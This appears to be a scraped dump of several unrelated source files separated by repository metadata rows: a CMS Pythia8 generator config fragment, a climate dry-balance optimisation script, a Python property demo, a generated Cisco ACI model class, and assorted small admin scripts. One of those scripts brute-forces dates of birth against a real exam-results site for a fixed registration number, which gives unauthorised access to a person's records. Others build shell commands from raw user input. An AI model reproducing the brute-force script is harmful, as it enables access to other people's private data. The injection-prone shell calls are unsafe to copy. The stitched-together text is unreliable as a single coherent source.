DECAY 6 1.37127534E+00 # Gamma(top)
1.00000000E+00 2 5 24 # BR(top -> bottom W)
"""
import FWCore.ParameterSet.Config as cms
from Configuration.Generator.Pythia8CommonSettings_cfi import *
from Configuration.Generator.Pythia8CUEP8M1Settings_cfi import *
generator = cms.EDFilter("Pythia8GeneratorFilter",
pythiaPylistVerbosity = cms.untracked.int32(1),
filterEfficiency = cms.untracked.double(1),
pythiaHepMCVerbosity = cms.untracked.bool(False),
SLHATableForPythia8 = cms.string('%s' % SLHA_TABLE),
comEnergy = cms.double(COM_ENERGY),
crossSection = cms.untracked.double(CROSS_SECTION),
maxEventsToPrint = cms.untracked.int32(1),
PythiaParameters = cms.PSet(
pythia8CommonSettingsBlock,
pythia8CUEP8M1SettingsBlock,
processParameters = cms.vstring(
'Higgs:useBSM = on',
PROCESS,
'SLHA:allowUserOverride = off',
'SLHA:minMassSM = 100.',
'PhaseSpace:mHatMin = 56.0'
),
parameterSets = cms.vstring(
'pythia8CommonSettings',
'pythia8CUEP8M1Settings',
'processParameters'
)
)
)
ProductionFilterSequence = cms.Sequence(generator)
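# Note (illustrative, not part of the original fragment): SLHA_TABLE, COM_ENERGY,
# CROSS_SECTION and PROCESS are expected to be defined earlier in this file.
# A minimal sketch of what such definitions typically look like; the values below
# are hypothetical placeholders, not the settings used for this sample.
# SLHA_TABLE = """<the SLHA spectrum shown above>"""
# COM_ENERGY = 13000.                  # centre-of-mass energy in GeV (assumed)
# CROSS_SECTION = 1.0                  # cross section in pb (assumed)
# PROCESS = 'HiggsBSM:all = on'        # example Pythia8 process switch (assumed)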
| [
"[email protected]"
] | |
e691a2e11a5d7b6d2a79e68b58420dbe79373ac5 | 35e6598c8f07e686ef4ce431800ece28d2797568 | /analysis/interactive_dry_bal_optimisation.py | a7722cf5881b54476a2e0db7eef13a82f2802764 | [] | no_license | akuhnregnier/python-inferno | c7badbed505da602c98180e70aff05061dd1a199 | 424168231f553d0f872f1a2ec29c26bf3d114f08 | refs/heads/main | 2023-04-16T03:15:27.427407 | 2023-01-28T19:15:05 | 2023-01-28T19:15:05 | 368,221,337 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,052 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pathlib import Path
import matplotlib.pyplot as plt
import numpy as np
from loguru import logger
from matplotlib.widgets import Slider
from numba import njit, prange
from numpy.testing import assert_allclose
from scipy.optimize import minimize
from tqdm import tqdm
from python_inferno.basinhopping import BasinHoppingSpace
from python_inferno.configuration import N_pft_groups
from python_inferno.data import (
handle_param,
key_cached_calculate_grouped_vpd,
key_cached_precip_moving_sum,
load_single_year_cubes,
timestep,
)
from python_inferno.space import generate_space_spec
@njit(nogil=True, parallel=True, cache=True, fastmath=True)
def fewer_calculate_grouped_dry_bal(
*,
grouped_vpd,
cum_rain,
rain_f,
vpd_f,
# NOTE This is where the output is placed and should be an (Nt, N_pft_groups,
# land_pts) np.float64 array.
out,
):
Nt = grouped_vpd.shape[0]
assert rain_f.shape[0] == N_pft_groups
assert vpd_f.shape[0] == N_pft_groups
assert len(out.shape) == 3
assert out.shape[:2] == (Nt, N_pft_groups)
for l in prange(out.shape[2]):
for ti in range(Nt):
for i in range(N_pft_groups):
if ti == 0:
prev_dry_bal = 0
else:
prev_dry_bal = out[ti - 1, i, l]
vpd_val = grouped_vpd[ti, i, l]
new_dry_bal = (
prev_dry_bal
+ rain_f[i] * cum_rain[ti, l]
- (1 - np.exp(-vpd_f[i] * vpd_val))
)
if new_dry_bal < -1.0:
out[ti, i, l] = -1.0
elif new_dry_bal > 1.0:
out[ti, i, l] = 1.0
else:
out[ti, i, l] = new_dry_bal
return out
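# Minimal shape sketch (illustrative, not part of the original module): the kernel
# expects grouped_vpd with shape (Nt, N_pft_groups, land_pts), cum_rain with shape
# (Nt, land_pts), per-group parameter vectors, and a pre-allocated float64 output.
# demo = fewer_calculate_grouped_dry_bal(
#     grouped_vpd=np.ones((4, N_pft_groups, 2)),
#     cum_rain=np.ones((4, 2)),
#     rain_f=np.full(N_pft_groups, 0.5),
#     vpd_f=np.full(N_pft_groups, 50.0),
#     out=np.zeros((4, N_pft_groups, 2)),
# )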
def get_fewer_climatological_grouped_dry_bal(
*,
filenames=tuple(
str(Path(s).expanduser())
for s in (
"~/tmp/new-with-antec5/JULES-ES.1p0.vn5.4.50.CRUJRA1.365.HYDE33.SPINUPD0.Instant.2010.nc",
"~/tmp/new-with-antec5/JULES-ES.1p0.vn5.4.50.CRUJRA1.365.HYDE33.SPINUPD0.Instant.2011.nc",
)
),
rain_f,
vpd_f,
verbose=False,
points=5,
):
"""Load instantaneous values from the files below, then calculate dry_bal, then
perform climatological averaging."""
rain_f = handle_param(rain_f)
vpd_f = handle_param(vpd_f)
clim_dry_bal = None
n_avg = 0
# Array used to store and calculate dry_bal.
grouped_dry_bal = None
for f in tqdm(
list(map(str, filenames)), desc="Processing dry_bal", disable=not verbose
):
data_dict = load_single_year_cubes(
filename=f,
variable_name_slices={
"t1p5m": (slice(None), slice(None), 0),
"q1p5m": (slice(None), slice(None), 0),
"pstar": (slice(None), 0),
"ls_rain": (slice(None), 0),
"con_rain": (slice(None), 0),
},
)
grouped_vpd = key_cached_calculate_grouped_vpd(
t1p5m_tile=data_dict["t1p5m"],
q1p5m_tile=data_dict["q1p5m"],
pstar=data_dict["pstar"],
# NOTE Special key used to store and retrieve memoized results.
cache_key=f,
)
cum_rain = key_cached_precip_moving_sum(
ls_rain=data_dict["ls_rain"],
con_rain=data_dict["con_rain"],
timestep=timestep,
# NOTE Special key used to store and retrieve memoized results.
cache_key=f,
)
if grouped_dry_bal is None:
# This array only needs to be allocated once for the first file.
grouped_dry_bal = np.zeros(
(data_dict["pstar"].shape[0], N_pft_groups, points), dtype=np.float64
)
# Calculate grouped dry_bal.
grouped_dry_bal = fewer_calculate_grouped_dry_bal(
grouped_vpd=grouped_vpd,
cum_rain=cum_rain,
rain_f=rain_f,
vpd_f=vpd_f,
out=grouped_dry_bal,
)
if clim_dry_bal is None:
clim_dry_bal = grouped_dry_bal
assert n_avg == 0
else:
clim_dry_bal += grouped_dry_bal
n_avg += 1
return clim_dry_bal / n_avg
space_template = dict(
rain_f=(1, [(0.5, 20.0)], float),
vpd_f=(1, [(1, 5000)], float),
)
space = BasinHoppingSpace(generate_space_spec(space_template))
# Histogram bins for `loss1`.
bins = np.linspace(-1, 1, 20)
# Need equally spaced bins.
bin_diff = np.diff(bins)[0]
assert_allclose(np.diff(bins), bin_diff)
# Histogram bins for `loss3` (applied to the time differences of dry_bal).
diff_bins = np.linspace(-2, 2, 10)
# Need equally spaced bins.
diff_bin_diff = np.diff(diff_bins)[0]
assert_allclose(np.diff(diff_bins), diff_bin_diff)
@njit(cache=True, nogil=True, parallel=True, fastmath=True)
def calc_loss1(*, dry_bal, bins, hists):
for i in prange(dry_bal.shape[1]):
hists[i] = np.histogram(dry_bal[:, i], bins=bins)[0]
hists /= dry_bal.shape[0] * (bins[1] - bins[0])
# Minimise the amount of variation between bins - all values should be represented
# as equally as possible.
# Normalise this metric by the number of samples.
return np.linalg.norm(hists - 0.5) / np.sqrt(hists.size)
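# Sanity sketch (illustrative, not part of the original script): `hists` holds
# density histograms, so for samples covering [-1, 1] uniformly each entry is
# ~0.5 (total mass 1 over a width of 2) and loss1 approaches zero.
# rng = np.random.default_rng(0)
# demo = rng.uniform(-1.0, 1.0, size=(10000, 3))
# print(calc_loss1(dry_bal=demo, bins=bins, hists=np.empty((3, bins.size - 1))))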
def get_to_optimise(*, loss1_c, loss2_c, loss3_c):
def to_optimise(x):
dry_bal = get_fewer_climatological_grouped_dry_bal(
**space.inv_map_float_to_0_1(dict(zip(space.continuous_param_names, x))),
verbose=False,
points=5,
)
# Select a single PFT since we are only using single parameters.
dry_bal = dry_bal[:, 0]
assert len(dry_bal.shape) == 2
loss1 = calc_loss1(
dry_bal=dry_bal,
bins=bins,
hists=np.empty((dry_bal.shape[1], bins.size - 1)),
)
loss3 = calc_loss1(
dry_bal=np.diff(dry_bal, axis=0),
bins=diff_bins,
hists=np.empty((dry_bal.shape[1] - 1, diff_bins.size - 1)),
)
# At the same time, the `dry_bal` variable should fluctuate between high and low
# values (instead of e.g. monotonically increasing).
# Add a factor to enhance the weight of this metric.
loss2 = abs(
(
(
np.sum(np.diff(dry_bal, axis=0) < 0)
/ ((dry_bal.shape[0] - 1) * dry_bal.shape[1])
)
- 0.5
)
)
c_arr = np.array([loss1_c, loss2_c, loss3_c])
c_arr /= np.sum(c_arr)
loss_arr = np.array([loss1, loss2, loss3])
# logger.info(f"cs: {','.join(map(str, c_arr))}")
return np.sum(c_arr * loss_arr)
return to_optimise
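# Usage sketch (illustrative): build the objective with equal weights and evaluate
# it at the mid-point of the unit hypercube explored by the optimiser.
# objective = get_to_optimise(loss1_c=1.0, loss2_c=1.0, loss3_c=1.0)
# print(objective(space.float_x0_mid))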
if __name__ == "__main__":
# Create the figure and the line that we will manipulate
fig, ax = plt.subplots()
def plot_line(x):
dry_bal = get_fewer_climatological_grouped_dry_bal(
**space.inv_map_float_to_0_1(dict(zip(space.continuous_param_names, x))),
verbose=False,
points=5,
)
# Select a single PFT since we are only using single parameters.
dry_bal = dry_bal[:, 0]
ys = dry_bal[:, 0]
if not hasattr(plot_line, "line"):
(line,) = ax.plot(ys)
plot_line.line = line
else:
plot_line.line.set_ydata(ys)
plot_line(space.float_x0_mid)
ax.set_xlabel("Time [s]")
axcolor = "0.2"
ax.margins(x=0)
# adjust the main plot to make room for the sliders
plt.subplots_adjust(bottom=0.4)
def get_slider(*, ypos, label, valmin=0.0, valmax=1.0, valinit=0.5):
slider_ax = plt.axes([0.25, ypos, 0.65, 0.03], facecolor=axcolor)
return Slider(
ax=slider_ax,
label=label,
valmin=valmin,
valmax=valmax,
valinit=valinit,
)
loss1_slider = get_slider(ypos=0.1, label="loss1")
loss2_slider = get_slider(ypos=0.15, label="loss2")
loss3_slider = get_slider(ypos=0.2, label="loss3")
# The function to be called anytime a slider's value changes
def update(val):
logger.info("Starting minimisation")
result = minimize(
get_to_optimise(
loss1_c=loss1_slider.val,
loss2_c=loss2_slider.val,
loss3_c=loss3_slider.val,
),
x0=space.float_x0_mid,
method="L-BFGS-B",
jac=None,
bounds=[(0, 1)] * len(space.continuous_param_names),
options=dict(maxfun=1000, ftol=1e-6, eps=1e-4, disp=True),
)
opt_x = result.x
logger.info(f"Completed minimisation, success: {result.success}.")
plot_line(opt_x)
fig.canvas.draw_idle()
# register the update function with each slider
for slider in (loss1_slider, loss2_slider, loss3_slider):
slider.on_changed(update)
plt.show()
| [
"[email protected]"
] | |
d932f0e7d08cd74e5251f86ce83becb224158a88 | fdf0b68373e003bd9f4f65e1194e3e79d7e18f4c | /day2/class_property.py | d8071ea3cfd35a66da48ab8039b7eb7fe7b53d08 | [] | no_license | artheadsweden/python_advanced_nov_17 | 79b721077da3ba3bb630fde53832071d4e71c3ae | 20f9d99ba4b996414b36fb0efe7244895b3fd34b | refs/heads/master | 2021-03-24T11:08:43.733521 | 2017-11-22T23:32:23 | 2017-11-22T23:32:23 | 111,556,488 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 396 | py | class P:
def __init__(self, x):
self.x = x
@property
def x(self):
return self.__x
@x.setter
def x(self, x):
if x < 0:
self.__x = 0
elif x > 1000:
self.__x = 1000
else:
self.__x = x
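# Illustrative behaviour of the clamping setter above (values mirror main() below):
# P(-1).x -> 0, P(500).x -> 500, P(2000).x -> 1000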
def main():
p = P(5000)
print(p.x)
p.x = 100000
print(p.x)
if __name__ == '__main__':
    main()
| [
"[email protected]"
] | |
037b23778dce32e14f051a0ac32f92024cf4db53 | 24fe1f54fee3a3df952ca26cce839cc18124357a | /servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/rtflt/rule.py | a30362b62695f20e291ad7aa5994ee5f6c75ad0d | [] | no_license | aperiyed/servicegraph-cloudcenter | 4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff | 9eb7975f2f6835e1c0528563a771526896306392 | refs/heads/master | 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 | Python | UTF-8 | Python | false | false | 4,052 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class Rule(Mo):
meta = ClassMeta("cobra.model.rtflt.Rule")
meta.isAbstract = True
meta.moClassName = "rtfltRule"
meta.rnFormat = ""
meta.category = MoCategory.REGULAR
meta.label = "Rule"
meta.writeAccessMask = 0x401002001
meta.readAccessMask = 0x401002001
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = False
meta.childClasses.add("cobra.model.fault.Delegate")
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
meta.superClasses.add("cobra.model.pol.Instr")
meta.superClasses.add("cobra.model.nw.FltRule")
meta.superClasses.add("cobra.model.naming.NamedObject")
meta.superClasses.add("cobra.model.pol.Obj")
meta.concreteSubClasses.add("cobra.model.rtpfx.Rule")
meta.concreteSubClasses.add("cobra.model.rtregcom.Rule")
meta.concreteSubClasses.add("cobra.model.rtmap.Rule")
meta.concreteSubClasses.add("cobra.model.rtextcom.Rule")
meta.rnPrefixes = [
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "descr", "descr", 5581, PropCategory.REGULAR)
prop.label = "Description"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "name", "name", 3682, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
meta.props.add("name", prop)
prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
prop.label = "Name alias"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 63)]
prop.regex = ['[a-zA-Z0-9_.-]+']
meta.props.add("nameAlias", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
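# Usage note (illustrative, not part of the generated file): this class is
# abstract (meta.isAbstract = True), so managed objects are created through the
# concrete subclasses registered above (e.g. cobra.model.rtmap.Rule) rather than
# by instantiating rtflt.Rule directly.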
# End of package file
# ##################################################
| [
"[email protected]"
] | |
8fdbac9d7d5f752ea4c0a45d3df0c4e0601c2464 | c21faf85627b1cfd96494aac73cc40e5f11ebb46 | /results/test_298.py | e6108f25b7e2a9da4c59a316828f65a5060a581a | [] | no_license | ekkya/Cyclomatic-Complexity | d02c61e009087e7d51738e60605875741532b878 | 172db2efdd974f5abad964e335552aec974b47cb | refs/heads/master | 2021-08-28T17:13:14.718314 | 2017-12-12T22:04:13 | 2017-12-12T22:04:13 | 112,042,202 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 74,019 | py | """Get the number of each character in any given text.
Inputs:
A txt file -- You will be asked for an input file. Simply input the name
of the txt file in which you have the desired text.
"""
import pprint
import collections
def main():
file_input = input('File Name: ')
with open(file_input, 'r') as info:
count = collections.Counter(info.read().upper())
value = pprint.pformat(count)
print(value)
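# Illustrative: collections.Counter tallies each character, so for the text "aab"
# collections.Counter("aab".upper()) == collections.Counter({'A': 2, 'B': 1}).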
if __name__ == "__main__":
    main()
# Script Name : pscheck.py
# Author : Craig Richards
# Created : 19th December 2011
# Last Modified : 17th June 2013
# Version : 1.1
# Modifications : 1.1 - 17/06/13 - CR - Changed to functions, and check os before running the program
# Description : Process check on Nix boxes, display formatted output from ps command
import commands, os, string
def ps():
program = raw_input("Enter the name of the program to check: ")
try:
#perform a ps command and assign results to a list
output = commands.getoutput("ps -f|grep " + program)
proginfo = string.split(output)
#display results
print "\n\
Full path:\t\t", proginfo[5], "\n\
Owner:\t\t\t", proginfo[0], "\n\
Process ID:\t\t", proginfo[1], "\n\
Parent process ID:\t", proginfo[2], "\n\
Time started:\t\t", proginfo[4]
except:
print "There was a problem with the program."
def main():
if os.name == "posix": # Unix/Linux/MacOS/BSD/etc
ps() # Call the function
elif os.name in ("nt", "dos", "ce"): # if the OS is windows
print "You need to be on Linux or Unix to run this"
if __name__ == '__main__':
    main()
from bs4 import BeautifulSoup
import datetime
import mechanize
import urllib2
# Create a Browser
b = mechanize.Browser()
# Disable loading robots.txt
b.set_handle_robots(False)
b.addheaders = [('User-agent',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98;)')]
# Navigate
b.open('http://cbseresults.nic.in/jee/jee_2015.htm')
# Choose a form
b.select_form(nr=0)
# Fill it out
b['regno'] = '37000304'
currentdate = datetime.date(1997,3,10)
enddate = datetime.date(1998,4,1)
while currentdate <= enddate:
ct=0
#print currentdate
yyyymmdd = currentdate.strftime("%Y/%m/%d")
ddmmyyyy = yyyymmdd[8:] + "/" + yyyymmdd[5:7] + "/" +yyyymmdd[:4]
print(ddmmyyyy)
b.open('http://cbseresults.nic.in/jee/jee_2015.htm')
b.select_form(nr=0)
b['regno'] = '37000304'
b['dob'] = ddmmyyyy
fd = b.submit()
#print(fd.read())
soup = BeautifulSoup(fd.read(),'html.parser')
for writ in soup.find_all('table'):
ct = ct + 1;
#print (ct)
if ct == 6:
print("---fail---")
else:
print("--true--")
break;
currentdate += datetime.timedelta(days=1)
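# Note (illustrative): the manual slicing above that builds ddmmyyyy is equivalent
# to currentdate.strftime("%d/%m/%Y")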
#print fd.read()
# Script Name : new_script.py
# Author : Craig Richards
# Created : 20th November 2012
# Last Modified :
# Version : 1.0
# Modifications :
# Description : This will create a new basic template for a new script
import os # Load the library module
import sys # Load the library module
import datetime # Load the library module
text = '''You need to pass an argument for the new script you want to create, followed by the script name. You can use
-python : Python Script
-bash : Bash Script
-ksh : Korn Shell Script
-sql : SQL Script'''
if len(sys.argv) < 3:
print text
sys.exit()
if '-h' in sys.argv or '--h' in sys.argv or '-help' in sys.argv or '--help' in sys.argv:
print text
sys.exit()
else:
if '-python' in sys.argv[1]:
config_file = "python.cfg"
extension = ".py"
elif '-bash' in sys.argv[1]:
config_file = "bash.cfg"
extension = ".bash"
elif '-ksh' in sys.argv[1]:
config_file = "ksh.cfg"
extension = ".ksh"
elif '-sql' in sys.argv[1]:
config_file = "sql.cfg"
extension = ".sql"
else:
print 'Unknown option - ' + text
sys.exit()
confdir = os.getenv("my_config")
scripts = os.getenv("scripts")
dev_dir = "Development"
newfile = sys.argv[2]
output_file = (newfile + extension)
outputdir = os.path.join(scripts,dev_dir)
script = os.path.join(outputdir, output_file)
input_file = os.path.join(confdir,config_file)
old_text = " Script Name : "
new_text = (" Script Name : " + output_file)
if not(os.path.exists(outputdir)):
os.mkdir(outputdir)
newscript = open(script, 'w')
input = open(input_file, 'r')
today = datetime.date.today()
old_date = " Created :"
new_date = (" Created : " + today.strftime("%d %B %Y"))
for line in input:
line = line.replace(old_text, new_text)
line = line.replace(old_date, new_date)
newscript.write(line)
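# Usage sketch (illustrative): running e.g. `python new_script.py -python mytool`
# would read python.cfg from the my_config directory and write mytool.py under
# <scripts>/Development with the script name and creation date stamped in.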
# Script Name : osinfo.py
# Authors : {'geekcomputers': 'Craig Richards', 'dmahugh': 'Doug Mahugh','rutvik1010':'Rutvik Narayana Nadimpally','y12uc231': 'Satyapriya Krishna', 'minto4644':'Mohit Kumar'}
# Created : 5th April 2012
# Last Modified : July 19 2016
# Version : 1.0
# Modification 1 : Changed the profile to list again. Order is important. Every time we run the script we don't want to see a different ordering.
# Modification 2 : Fixed the AttributeError checking for all properties. Using hasttr().
# Modification 3 : Removed ': ' from properties inside profile.
# Description : Displays some information about the OS you are running this script on
import platform as pl
profile = [
'architecture',
'linux_distribution',
'mac_ver',
'machine',
'node',
'platform',
'processor',
'python_build',
'python_compiler',
'python_version',
'release',
'system',
'uname',
'version',
]
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
for key in profile:
if hasattr(pl, key):
print(key + bcolors.BOLD + ": " + str(getattr(pl, key)()) + bcolors.ENDC)
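# Example output (illustrative; values vary by machine, ANSI colour codes omitted):
# machine: x86_64
# python_version: 3.6.9
# system: Linux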
import csv
import glob
import os
import pdb
import pandas as pd
def main():
directory = []
for dirs in os.walk("."):
directory.append(dirs)
folders = directory[0][1]
for ff in folders:
if ff != ".git":
allFiles = glob.glob(ff + "/*.csv")
frame = pd.DataFrame()
dfs = []
for files in allFiles:
df = pd.read_csv(files, index_col=None, header=0)
dfs.append(df)
frame = pd.concat(dfs)
frame.to_csv(ff + "/results.csv")
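# Note (illustrative): pd.concat(dfs) stacks the per-file frames row-wise; passing
# ignore_index=True would rebuild a clean 0..n-1 index for the combined frame.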
main()
# Script Name : logs.py
# Author : Craig Richards
# Created : 13th October 2011
# Last Modified : 14 February 2016
# Version : 1.2
#
# Modifications : 1.1 - Added the variable zip_program so you can set it for the zip program on whichever OS, so to run on a different OS just change the locations of these two variables.
# : 1.2 - Tidy up comments and syntax
#
# Description : This script will search for all *.log files in the given directory, zip them using the program you specify and then date stamp them
import os # Load the Library Module
from time import strftime # Load just the strftime Module from Time
logsdir = "c:\puttylogs" # Set the Variable logsdir
zip_program = "zip.exe" # Set the Variable zip_program - 1.1
for files in os.listdir(logsdir): # Find all the files in the directory
if files.endswith(".log"): # Check to ensure the files in the directory end in .log
files1 = files + "." + strftime("%Y-%m-%d") + ".zip" # Create the Variable files1, this is the files in the directory, then we add a suffix with the date and the zip extension
os.chdir(logsdir) # Change directory to the logsdir
os.system(zip_program + " " + files1 +" "+ files) # Zip the logs into dated zip files for each server. - 1.1
        os.remove(files)                # Remove the original log files
# Script Name : check_for_sqlite_files.py
# Author : Craig Richards
# Created : 07 June 2013
# Last Modified : 14 February 2016
# Version : 1.0.1
# Modifications : 1.0.1 - Remove unecessary line and variable on Line 21
# Description : Scans directories to check if there are any sqlite files in there
import os
def isSQLite3(filename):
from os.path import isfile, getsize
if not isfile(filename):
return False
if getsize(filename) < 100: # SQLite database file header is 100 bytes
return False
else:
fd = open(filename, 'rb')
Header = fd.read(100)
fd.close()
if Header[0:16] == 'SQLite format 3\000':
return True
else:
return False
log=open('sqlite_audit.txt','w')
for r,d,f in os.walk(r'.'):
    for files in f:
        fullpath = os.path.join(r, files)       # Build the full path so the size/header checks work outside the current directory
        if isSQLite3(fullpath):
            print files
            print "[+] '%s' **** is a SQLITE database file **** " % fullpath
            log.write("[+] '%s' **** is a SQLITE database file **** " % fullpath+'\n')
        else:
            log.write("[-] '%s' is NOT a sqlite database file" % fullpath+'\n')
# Script Name : create_dir_if_not_there.py
# Author : Craig Richards
# Created : 09th January 2012
# Last Modified : 22nd October 2015
# Version : 1.0.1
# Modifications : Added exceptions
# : 1.0.1 Tidy up comments and syntax
#
# Description : Checks to see if a directory exists in the users home directory, if not then create it
import os # Import the OS module
try:
home = os.path.expanduser("~") # Set the variable home by expanding the users set home directory
print home # Print the location
if not os.path.exists(home + '/testdir'):
os.makedirs(home + '/testdir') # If not create the directory, inside their home directory
except Exception, e:
    print e
# Script Name : move_files_over_x_days.py
# Author : Craig Richards
# Created : 8th December 2011
# Last Modified :
# Version : 1.0
# Modifications :
# Description : This will move all the files from the src directory that are over 240 days old to the destination directory.
import shutil
import sys
import time
import os
src = 'u:\\test' # Set the source directory
dst = 'c:\\test' # Set the destination directory
now = time.time() # Get the current time
for f in os.listdir(src):                                       # Loop through all the files in the source directory
    f = os.path.join(src, f)                                    # Build the full path, so the checks below work from any working directory
    if os.stat(f).st_mtime < now - 240 * 86400:                 # Work out how old they are, if they are older than 240 days old
        if os.path.isfile(f):                                   # Check it's a file
            shutil.move(f, dst)                                 # Move the files
# Script Name : sqlite_table_check.py
# Author : Craig Richards
# Created : 07 June 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Checks the main SQLITE database to ensure all the tables should exist
import sqlite3
import sys
import os
dropbox = os.getenv("dropbox")
config = os.getenv("my_config")
dbfile = ("Databases\jarvis.db")
listfile = ("sqlite_master_table.lst")
master_db = os.path.join(dropbox, dbfile)
config_file = os.path.join(config, listfile)
tablelist = open(config_file,'r');
conn = sqlite3.connect(master_db)
cursor = conn.cursor()
cursor.execute('SELECT SQLITE_VERSION()')
data = cursor.fetchone()
if str(data) == "(u'3.6.21',)":
print ("\nCurrently " + master_db + " is on SQLite version: %s" % data + " - OK -\n")
else:
print ("\nDB On different version than master version - !!!!! \n")
conn.close()
print ("\nCheckling " + master_db + " against " + config_file + "\n")
for table in tablelist.readlines():
conn = sqlite3.connect(master_db)
cursor = conn.cursor()
cursor.execute("select count(*) from sqlite_master where name = ?",(table.strip(), ))
res = cursor.fetchone()
if (res[0]):
print ('[+] Table : ' + table.strip() + ' exists [+]')
else:
print ('[-] Table : ' + table.strip() + ' does not exist [-]')
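# Illustrative format of sqlite_master_table.lst (hypothetical names, one expected
# table per line):
# users
# settings
# history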
# Script Name : puttylogs.py
# Author : Craig Richards
# Created : 13th October 2011
# Last Modified : 29th February 2012
# Version : 1.2
# Modifications : 1.1 - Added the variable zip_program so you can set it for the zip program on whichever OS, so to run on a different OS just change the locations of these two variables.
# : 1.2 - 29-02-12 - CR - Added shutil module and added one line to move the zipped up logs to the zipped_logs directory
# Description : Zip up all the logs in the given directory
import os # Load the Library Module
import shutil # Load the Library Module - 1.2
from time import strftime # Load just the strftime Module from Time
logsdir="c:\logs\puttylogs" # Set the Variable logsdir
zipdir="c:\logs\puttylogs\zipped_logs" # Set the Variable zipdir - 1.2
zip_program="zip.exe" # Set the Variable zip_program - 1.1
for files in os.listdir(logsdir): # Find all the files in the directory
if files.endswith(".log"): # Check to ensure the files in the directory end in .log
files1=files+"."+strftime("%Y-%m-%d")+".zip" # Create the Variable files1, this is the files in the directory, then we add a suffix with the date and the zip extension
os.chdir(logsdir) # Change directory to the logsdir
os.system(zip_program + " " + files1 +" "+ files) # Zip the logs into dated zip files for each server. - 1.1
shutil.move(files1, zipdir) # Move the zipped log files to the zipped_logs directory - 1.2
os.remove(files) # Remove the original log files
# Script Name : daily_checks.py
# Author : Craig Richards
# Created : 07th December 2011
# Last Modified : 01st May 2013
# Version : 1.5
#
# Modifications : 1.1 Removed the static lines for the putty sessions, it now reads a file, loops through and makes the connections.
# : 1.2 Added a variable filename=sys.argv[0] , as when you use __file__ it errors when creating an exe with py2exe.
# : 1.3 Changed the server_list.txt file name and moved the file to the config directory.
# : 1.4 Changed some settings due to getting a new pc
# : 1.5 Tidy comments and syntax
#
# Description : This simple script loads everything I need to carry out the daily checks for our systems.
import platform # Load Modules
import os
import subprocess
import sys
from time import strftime # Load just the strftime Module from Time
def clear_screen(): # Function to clear the screen
if os.name == "posix": # Unix/Linux/MacOS/BSD/etc
os.system('clear') # Clear the Screen
elif os.name in ("nt", "dos", "ce"): # DOS/Windows
os.system('CLS') # Clear the Screen
def print_docs(): # Function to print the daily checks automatically
print ("Printing Daily Check Sheets:")
# The command below passes the command line string to open word, open the document, print it then close word down
subprocess.Popen(["C:\\Program Files (x86)\Microsoft Office\Office14\winword.exe", "P:\\\\Documentation\\Daily Docs\\Back office Daily Checks.doc", "/mFilePrintDefault", "/mFileExit"]).communicate()
def putty_sessions(conffilename):                       # Function to load the putty sessions I need; the config file name is passed in rather than read from a global
    for server in open(conffilename):                   # Open the file server_list.txt, loop through reading each line - 1.1 -Changed - 1.3 Changed name to use variable conffilename
        subprocess.Popen(('putty -load '+server))       # Open the PuTTY sessions - 1.1
def rdp_sessions():
print ("Loading RDP Sessions:")
subprocess.Popen("mstsc eclr.rdp") # Open up a terminal session connection and load the euroclear session
def euroclear_docs():
# The command below opens IE and loads the Euroclear password document
subprocess.Popen('"C:\\Program Files\\Internet Explorer\\iexplore.exe"' '"file://fs1\pub_b\Pub_Admin\Documentation\Settlements_Files\PWD\Eclr.doc"')
# End of the functions
# Start of the Main Program
def main():
filename = sys.argv[0] # Create the variable filename
